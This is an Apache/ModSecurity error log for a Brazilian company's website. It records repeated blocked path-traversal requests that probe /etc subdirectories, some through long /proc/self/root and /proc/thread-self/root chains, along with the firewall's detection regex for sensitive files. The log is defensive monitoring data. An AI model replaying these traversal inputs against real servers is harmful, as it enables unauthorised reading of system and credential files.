[Fri Mar 20 09:19:23.124669 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:55430] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07S_qxLDW4GITHUkT5jwAAAQI"]
[Fri Mar 20 09:19:24.267311 2026] [:error] [pid 7893:tid 140411683178240] [client 216.73.216.191:55632] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07TBCii7xarUs8iHZ3OgAAAgc"]
[Fri Mar 20 09:19:24.455391 2026] [:error] [pid 11642:tid 140411683178240] [client 216.73.216.191:55724] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07TLninkcc-iUj5ApuCQAAA4c"]
[Fri Mar 20 09:19:24.649149 2026] [:error] [pid 15826:tid 140411557287680] [client 216.73.216.191:55686] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07TOoXxyEfFpUF8f-QHgAAAVY"]
[Fri Mar 20 09:19:25.749242 2026] [mime_magic:error] [pid 7235:tid 140411616036608] (70014)End of file found: [client 57.141.18.57:55812] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:26.308315 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:55330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Tl1pVZ5mVmJwsFNBUQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:27.844965 2026] [:error] [pid 11167:tid 140411716749056] [client 216.73.216.191:55878] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07T_HIg5MgXLBnicMGuQAAAcM"]
[Fri Mar 20 09:19:27.846207 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:55338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07T_XLqtnMIWvjpaKp-wAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:27.871046 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:55868] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07ThCii7xarUs8iHZ3RQAAAgs"]
[Fri Mar 20 09:19:27.871074 2026] [:error] [pid 21219:tid 140411616036608] [client 216.73.216.191:55874] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07T_XLqtnMIWvjpaKp-QAAAo8"]
[Fri Mar 20 09:19:27.872641 2026] [mime_magic:error] [pid 21219:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:55884] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:27.872649 2026] [mime_magic:error] [pid 21219:tid 140411699963648] (70014)End of file found: [client 57.141.18.65:55858] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:27.885778 2026] [mime_magic:error] [pid 21219:tid 140411582465792] (70014)End of file found: [client 57.141.18.78:55886] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:27.885917 2026] [mime_magic:error] [pid 7893:tid 140411632822016] (70014)End of file found: [client 57.141.18.110:55876] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:27.886137 2026] [mime_magic:error] [pid 7893:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:55750] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:29.392899 2026] [:error] [pid 31215:tid 140411565680384] [client 216.73.216.191:55914] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07UAF0L0L-SsrnPo54OwAAAtU"]
[Fri Mar 20 09:19:29.400930 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:55910] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07UPqxLDW4GITHUkT5lwAAAQY"]
[Fri Mar 20 09:19:29.723690 2026] [:error] [pid 7235:tid 140411548894976] [client 216.73.216.191:55964] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07UfqxLDW4GITHUkT5mQAAARc"]
[Fri Mar 20 09:19:29.999005 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.243.128:56088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Ubninkcc-iUj5ApuEwAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:32.524855 2026] [:error] [pid 11642:tid 140411599251200] [client 216.73.216.191:56090] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07VLninkcc-iUj5ApuFQAAA5E"]
[Fri Mar 20 09:19:32.619263 2026] [mime_magic:error] [pid 31215:tid 140411548894976] (70014)End of file found: [client 57.141.18.66:56096] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:32.675228 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:56102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07VBCii7xarUs8iHZ3TAAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:32.799890 2026] [:error] [pid 26799:tid 140411741927168] [client 216.73.216.191:56114] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07VNa6ubjKNq_cu4bmjQAAA0A"]
[Fri Mar 20 09:19:33.407900 2026] [:error] [pid 9818:tid 140411725141760] [client 216.73.216.191:56148] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07VV1pVZ5mVmJwsFNBVwAAAEI"]
[Fri Mar 20 09:19:33.536898 2026] [:error] [pid 7235:tid 140411658000128] [client 216.73.216.191:56106] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07VfqxLDW4GITHUkT5oAAAAQo"]
[Fri Mar 20 09:19:34.264006 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:56112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07VjJ3M9BSuKP7CAYukQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:34.863558 2026] [:error] [pid 11167:tid 140411708356352] [client 216.73.216.191:56232] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07VvHIg5MgXLBnicMGwQAAAcQ"]
[Fri Mar 20 09:19:35.783869 2026] [:error] [pid 15826:tid 140411616036608] [client 216.73.216.191:56278] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07V-oXxyEfFpUF8f-QKAAAAU8"]
[Fri Mar 20 09:19:35.819396 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:56124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07VzJ3M9BSuKP7CAYulAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:35.835459 2026] [:error] [pid 10189:tid 140411574073088] [client 216.73.216.191:56286] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07VzJ3M9BSuKP7CAYulQAAAJQ"]
[Fri Mar 20 09:19:36.603238 2026] [:error] [pid 26799:tid 140411574073088] [client 216.73.216.191:56272] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07WNa6ubjKNq_cu4bmkwAAA1Q"]
[Fri Mar 20 09:19:36.662361 2026] [:error] [pid 11167:tid 140411574073088] [client 216.73.216.191:56334] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07WPHIg5MgXLBnicMGxwAAAdQ"]
[Fri Mar 20 09:19:36.812100 2026] [:error] [pid 7235:tid 140411649607424] [client 216.73.216.191:56342] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07WPqxLDW4GITHUkT5pAAAAQs"]
